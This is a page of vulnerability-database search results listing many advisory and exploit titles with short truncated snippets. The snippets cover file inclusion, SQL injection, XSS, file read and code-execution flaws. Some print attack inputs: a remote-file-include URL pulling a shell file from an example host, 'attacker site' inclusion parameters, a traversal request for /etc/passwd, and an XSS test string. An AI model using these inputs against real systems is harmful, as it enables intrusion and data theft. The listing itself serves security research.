56796 matches found
Newswriter SW <= 1.42 (editfunc.inc.php) File Include Vulnerability
No description provided by source. ============================================================================================== Newswriter SW = 1.42 NWCONFSYSTEMserverpath Remote File Inclusion Vulnerability...
VLC media player 2.2.8 Arbitrary Code Execution PoC(CVE-2018-11529)
Exploit Title: VLC media player 2.2.8 Arbitrary Code Execution PoC Date: 6-6-2018 Exploit Author: Eugene Ng Vendor Homepage: https://www.videolan.org/vlc/index.html Software Link: http://download.videolan.org/pub/videolan/vlc/2.2.8/win64/vlc-2.2.8-win64.exe Version: 2.2.8 Tested on: Windows 10 x6...
MySQL COM_FIELD_LIST命令远程溢出漏洞
BUGTRAQ ID: 40106 CVE ID: CVE-2010-1850 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 远程攻击者可以通过向MySQL数据库提交包含有超长表格名称参数的COMFIELDLIST命令触发缓冲区溢出,导致执行任意代码。 MySQL 5.1/5.0 厂商补丁: Oracle ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://bugs.mysql.com/bug.php?id=53237...
Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability(CVE-2016-9310)
Summary An exploitable configuration modification vulnerability exists in the control mode mode 6 functionality of ntpd. A specially crafted control mode packet can set ntpd traps, providing information disclosure and DDoS amplification, and unset ntpd traps, preventing legitimate monitoring. A...
phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf 跨站脚本漏洞
1、漏洞文件为:http://www.phpwind.net/res/js/dev/utillibs/jPlayer/Jplayer.swf2、反编译后看代码:this.jQuery = loaderInfo.parameters.jQuery + "'" + loaderInfo.parameters.id + "'.jPlayer"; …… private function initarg1:TimerEvent:void this.myInitTimer.stop; if ExternalInterface.available ……...
Siemens SIMATIC WinCC Sm@rtClient和SIMATIC WinCC Sm@rtClient Lite 信息泄露漏洞
No description provided by source...
Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Plogger = Beta 2.1 SQL injection / administrative credentials disclosure\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "- works with magicquotesgpc = Off\r\n\r\n...
Apps industrial OT over Server: Anti-Web Remote Command Execution(CVE-2017-17888)
Exploit Title: Apps industrial OT over Server: "Anti-Web 3.x.x 3.8.x" vuln: Remote Command Execution Date: 15/05/2017 Exploit Author: Fernandez Ezequiel @capitanalfa && Bertin Jose @bertinjoseb Vendor: Multiples vendors Category: Industrial OT webapps + DESCRIPTION: vulnerability: RCE REMOTE...
IPS Community Suite <= 4.1.12.3 Autoloaded PHP remote code execution vulnerability
Details source: The know Chong Yu 404 security lab A vulnerability overview 1. Vulnerability information "IPS Community Suite "is a foreign of the more common cms. But in its 4. 1. 12. 3 version and the following version, there is a PHP code injection vulnerability that stems from the procedures...
phpmpsSQL注入漏洞之2
简要描述: 过滤不严。 详细说明: 在member.php中 case 'delcom': $comid = trim$REQUEST'id'; $sql = "select userid from $tablecom where comid='$comid' "; $comuserid = $db-getOne$sql; if$comuserid!=$useridshowmsg'此信息不是您发布的,您不能修改'; $sql = "SELECT thumb FROM $tablecom WHERE comid IN $comid"; $image = $db-getOne$sql;...
Microsoft Windows通用控件ActiveX控件远程代码执行漏洞
Bugtraq ID:54948 CVE ID:CVE-2012-1856 Microsoft Windows是一款流行的操作系统。 Microsoft Windows多个产品使用的MSCOMCTL.OCX中的通用控件TabStrip ActiveX控件存在漏洞,允许攻击者构建特制的文档或WEB页面,诱使用户解析,可破坏内存,可以应用程序上下文执行任意代码。目前此漏洞已经在网络上积极利用。 0 Microsoft Commerce Server 2002 Microsoft Commerce Server 2007 Microsoft Commerce Server 2009...
CSDN Blog XSS Bug
CSDN是中国最大的IT技术社区,CSDN blog是面向中文地区IT专业技术人员的Blog门户,有不少IT牛人在上面开博。 在CSDN博客发表文章的时候,如果用“设计视图”模式编辑正文,不会产生跨站,测试代码scriptalert'zerosoul'/script会被转义成scriptalert'zerosoul'/script转义了左尖括号。 但是如果我们点击“源视图”模式进行编辑正文并发帖的话,就不会再对左尖括号转义,造成跨站漏洞。 测试链接:http://blog.csdn.net/zerosoul/ http://hi.csdn.net 等待官方修补...
Node-RED-Dashboard 任意文件读取漏洞 (CVE-2021-3223)
...
Microsoft Windows本地提权漏洞(CVE-2021-1732)
CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds Mar 25, 2021 • iamelli0t CVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT organization in one operation which was disclosed in February this year123. This vulnerability exploits a user mode callback opportunity i...
Tomcat code execution vulnerability(CVE-2017-12615)
Vulnerability tidbits 2017 9 November 19, Apache Tomcat official confirmation and fixes two high-risk vulnerabilities, the vulnerability CVE number:CVE-2017-12615 and CVE-2017-12616,wherein the remote code execution vulnerability, CVE-2017-12615 impact: Apache Tomcat 7.0.0 - 7.0.79(7.0.81 repair...
大汉jcms某处SQL注入漏洞一枚
简要描述: RT 详细说明: 貌似通杀不少版本的 直接分析了 漏洞文件:/jcms/jcmsfiles/jcms1/web2/site/module/comment/oprgetcount.jsp 漏洞参数:fnKeywords 漏洞类型:SQL注入(GET型) 漏洞分析: 先看oprgetcount.jsp文件: ......//省掉前面无关代码 % response.setHeader"Pragma","No-cache"; response.setHeader"Cache-Control","no-cache"; response.setDateHeader"Expires", 0...
RichStrong CMS (showproduct.asp cat) Remote SQL Injection Exploit
No description provided by source. --==+=================== Spanish Hackers Team www.spanish-hackers.com =================+==-- --==+ RichStrong CMS showproduct.asp?cat= Remote SQL Injection Exploit +==-- --==+====================================================================================+==...
MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...
FdWeB Espace Membre Admin_Menu.PHP远程文件包含漏洞
FdWeB Espace Membre是一款基于PHP的WEB应用程序。 FdWeB Espace Membre不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'AdminMenu.PHP'脚本对用户提交的'phpbbrootpath'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 FdWeB Espace Membre 2.01 FdWeB Espace Membre 2.0 目前没有解决方案提供: http://www.fdweb.org/ html head meta...
Microsoft Hyper-V 远程代码执行漏洞(CVE-2021-28476)
CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. This is a proof of concept for CVE-2021-28476 "Hyper-V Remote Code Execution Vulnerability", an arbitrary memory read in vmswitch.sys Network virtualization service provider patched by Microso...
wordpress 5.7 授权XXE漏洞(CVE-2021-29447)
WordPress 5.7 XXE Vulnerability BY KARIM EL OUERGHEMMI|APRIL 26, 2021 At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to detect more OWASP Top 10 and CWE Top 25 issue types. When testing our new analyzers against some...
蓝凌OA 后台任意文件写入漏洞
...
用友TurboCRM /ajax/getemaildata.php 任意文件读取漏洞
漏洞信息: 用友TurboCRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势,专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 用友TurboCRM /ajax/getemaildata.php 存在任意文件读取漏洞导致敏感信息泄漏。 漏洞分析: 漏洞存在于/ajax/getemaildata.php filePath参数未有效过滤,导致可以使用 ../../ 越权读取任意文件。 可使用以下URl测试读取系统文件:...
ThinkSAAS最新版2.4 Xss漏洞 指谁打谁
简要描述: thinksaas2.4+php2.6+apache2 未过滤 感谢@xfkxfk 详细说明: 先看消息写入代码: /var/www/html/thinksaas/app/user/action/message.php case "do": $msguserid = $userid; $msgtouserid = intval$POST'touserid'; $msgcontent = tsFilter$POST'content'; //用tsFilter过滤 aac'system'-antiWord$msgcontent; //过滤垃圾词...
VxWorks WDB Agent 远程内存读取漏洞
VxWorks安全初探 404@KnownSec --- 0x00 前言 --- 关于VxWorks,这里引用44CON议题《攻击 VxWorks:从石器时代到星际》探究 一文章中的介绍: VxWorks 是世界上使用最广泛的一种在嵌入式系统中部署的实时操作系统,是由美国WindRiver公司(简称风河公司,即WRS 公司)于1983年设计开发的。其市场范围跨越所有的安全关键领域,仅举几例,包括火星好奇心流浪者、波音787梦幻客机、网络路由器。这些应用程序的安全高危性质使得VxWorks的安全被高度关注。 VxWorks操作系统是由美国Wind...
PhpHostBot Login.PHP远程文件包含漏洞
PhpHostBot是一款基于PHP的WEB应用程序。 PhpHostBot不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以应用程序进程权限执行任意命令。 问题是由于'Login.PHP'脚本对用户提交的'svrrootscript'参数缺少过滤,提交远程服务器上的任意PHP文件作为包含对象,可导致以WEB权限执行任意PHP代码。 PhpHostBot 1.06 目前没有解决方案提供: http://www.idevspot.com/PhpHostBot.php...
极通 EWEBS 应用虚拟化系统 任意文件读取漏洞
No description provided by source...
Vigor ACS Unsafe Flex AMF Java Object Deserialization(CVE-2017-5641)
Vulnerability Summary A vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code. VigorACS 2 “is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of...
用友人力资源管理软件全版本XXE漏洞
简要描述: 用友人力资源管理软件全版本XXE漏洞 详细说明: i-漏洞描述 e-hr在登陆及重置密码处理时,使用xml将用户名、密码及验证码传递给后端进行解析处理,而后端对传进来的xml文件并未作严谨验证导致,可以传进构造的恶意xml文件进行查看文件及ssrf。 由于之前提交未通过,说是与一个注入重复可能是我上次的提交说的不够详细,so不管怎样请漏洞审查者对此漏洞进行再次认真考量。谢谢 ii-漏洞证明 google/baidu搜索inurl:/hrss/login.jsp 以搜索出的ehr.mc2.cn进行演示其他的有的较敏感,有的有防火墙。 主页打开效果: 登陆抓包: POST...
Apache HTTPD suEXEC本地特权提升漏洞
Apache HTTP server是一款流行的WEB服务程序。 Apache HTTP server包含的suexec应用程序存在设计问题,本地攻击者可以利用漏洞提升特权。 问题一是路径检查竞争条件漏洞 在获得当前目录和更改目录中存在竞争条件问题。另一个存在于更改目录和检查目录是否为链接也存在竞争条件问题。目录结构在这些操作中更换,会导致可以在攻击者选择的任意目录中执行lstat。通过使用符号链接或重命名父目录来利用。第三个竞争条件存在于最后符号链接检查和执行目标两进制程序中。 问题二是路径检查错误 suexec工具使用strncmp检查是否当前目录是DOCU...
手把手教你获取wdCP主机管理系统的PHP源代码
简要描述: 获取源代码后可通过阅读源代码查找是否存在漏洞,万一找到漏洞危害性还是比较大的。 详细说明: wdCP是WDlinux Control Panel的简称,是一套通过WEB控制和管理服务器的Linux服务器管理系统以及虚拟主机管理系统,旨在易于使用Linux系统做为我们的网站服务器系统,以及平时对Linux服务器的常用管理操作,均可在wdCP的后台里操作完成。 wdCP是使用PHP语言开发并对PHP文件进行加密,需要phpwdcpm.so扩展解析。 其实这次的方法很简单,此方法对一些类似的PHP文件加密也有效,下面来看操作以index.php文件为例。...
YXcms后台csrf添加管理员+getshell
简要描述: YXcms后台csrf添加管理员+getshell 详细说明: 没有任何验证,加上他又一个模版功能可建立php文件,导致getshell 漏洞证明: 1、后台添加管理然后用burp截断 我们发现没有验证,然后就构造表单 None 接下来用菜刀连接试试 连接成功...
PHPSavant Savant2 stylesheet.php mosConfig_absolute_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19151/info Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files containing...
DedeEIMS /include/common.inc.php 登陆绕过漏洞
No description provided by source...
青果教务网络管理系统逻辑处理不严谨导致SQL注入,可至全国数百所高校教务系统沦陷
简要描述: 在这个系统官网上发现该教务系统全国有535所高校在用,测试了几个都成功了,直接是SA权限的MSSQL,有个别貌似版本不一样不行,但是应该大多数都可以通杀。 详细说明: 这里可以看见该系统使用学校(http://www.kingosoft.com/cgal/index1.aspx),教务系统有535所学校在用,貌似这个系统有2个版本,有一个较新的不行,但是大多数都是老版本,可以成功利用该漏洞对服务器攻击,差不多可以影响上百所高校教务系统吧。 接下来分析一下漏洞形成:...
Tagger LE Tags.PHP远程文件包含漏洞
Tagger LE是一款基于PHP的WEB应用程序。 Tagger LE不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'tags.php'脚本对用户提交的'BBCodeFile'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Venture Nine Tagger LE 3 http://www.venturenine.com/ http://www.example.com/tags.php?BBCodeFile=http://www.example2.com/shell.dat?...
Microsoft SharePoint Server 远程代码执行漏洞(CVE-2021-28474)
In May of 2021, Microsoft released a patch to correct CVE-2021-28474, a remote code execution bug in supported versions of Microsoft SharePoint Server. This bug was reported to ZDI by an anonymous researcher and is also known as ZDI-21-574. This blog takes a deeper look at the root cause of this...
逐浪CMS v2.4 UploadHandler.ashx 任意文件上传漏洞
No description provided by source...
douphp /cache 目录物理路径泄漏
漏洞分析 漏洞文件 cache目录下的所有文件 如:admin/backup.htm.php php tplvars'lang''home'; ?//会引起报错 2. 漏洞利用 直接访问 http://www.douco.com/cache/admin/backup.htm.php 然后查看网页源码,泄漏物理路径 3. 漏洞修复 关闭错误信息显示...
FCKeditor 2.6 /fckeditor/editor/filemanager/connectors/uploadtest.html 文件上传漏洞
No description provided by source...
YouYaX最新版存储型XSS漏洞(demo复现)
简要描述: RT 详细说明: 在回复消息处 cookie也可以获取 漏洞证明: 在回复消息处 cookie也可以获取...
大汉Jvideo两处漏洞小合集(可能导致管理后台权限劫持)
简要描述: 两处。 详细说明: 一个是任意文件下载,一个是sql注入。 先看任意文件下载吧,任意文件下载可以下载到setup的相关安装信息,从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml 来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini 可以看见setup下Admin的密码(屏蔽了),登录成功 另外一个网站...
FreeType2 PFB和TTF字体解析单字节堆溢出漏洞
BUGTRAQ ID: 29637,29639 CVECAN ID: CVE-2008-1808 FreeType是一个流行的字体函数库。 FreeType中负责解析PFB和TTF字体文件的代码中存在多个堆溢出漏洞。 PFB文件中包含有各种数据结构,其中的一些储存为tabular格式。在解析表格时,有漏洞的代码段没有正确地验证用作堆缓冲区数组索引的值。计算中存在单字节错误,可能导致堆溢出。...
Bubla远程文件包含漏洞
Bubla是一款基于PHP的WEB应用程序。 Bubla不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'budir'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Bubla Bubla 0.9.2 目前没有解决方案提供 http://example.com/PATH/bu/buclaro.php?budir=attacker site http://example.com/PATH/bu/bucache.php?budir=attacker site...
Foosun cms .net版本 City_ajax.aspx 参数 id SQL注入漏洞
0x01漏洞简介 Foosun cms .net版本在/user/Cityajax.aspx对参数Cityid过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞执行SQL指令,获取敏感信息。 0x02漏洞详情 SQL注入漏洞:/user/Cityajax.aspx?Cityid=1 http://.../user/Cityajax.aspx?Cityid=1 数据和用户 0x03修复方案 过滤,或者使用参数化的SQL语句。...
Rails Dynamic Render 远程命令执行漏洞 (CVE-2016-0752)
如果你的应用程序使用的动态模版路径 例如: render params:id 那么你的程序将会存在远程代码执行和本地文件包含漏洞. 请把你的 Rails 升级到最新版本, 或者重构你的 controllers。 我们将展示如何在特定环境下使用代码执行和本地包含漏洞去攻击 Ruby on Rails 。 Rails的控制器有包含指定渲染文件的功能,举个例子, 当我们调用 show 方法的时候,如果没有定义其他渲染方法,该框架将会隐藏渲染 show.html.erb 文件。 在绝大多数情况下,开发者会输出不同的格式,例如:文本, JSON, XML 或者其他任何格式,或者查看一个文件,...
shopNC B2B版 /microshop/index.php处存在SQL注入漏洞
No description provided by source...
金蝶旗下快递100某处任意文件读取
简要描述: RT 详细说明: http://net.kuaidi100.com/youshang-network/logined/auditInfo?method=auditInfoView 照片查看任意文件读取,通过 %00截断 GET /youshang-network/getImage?path=2015-07%2F2015-07-22%2F../../../../../../../etc/passwd%00.jpg HTTP/1.1 Host: net.kuaidi100.com Proxy-Connection: keep-alive Accept:...
Linux 2.6.x fs/pipe.c local root exploit
No description provided by source. For those who were not yet aware, there is at least 3 public exploits since 11/05/2009 for CVE-2009-3547 targeting all linux kernels from 2.6.0 to 2.6.31 included. Since spender and fotis have already release their own, there is not need for us to keep this on o...
MCMS fastjson解析RCE漏洞
...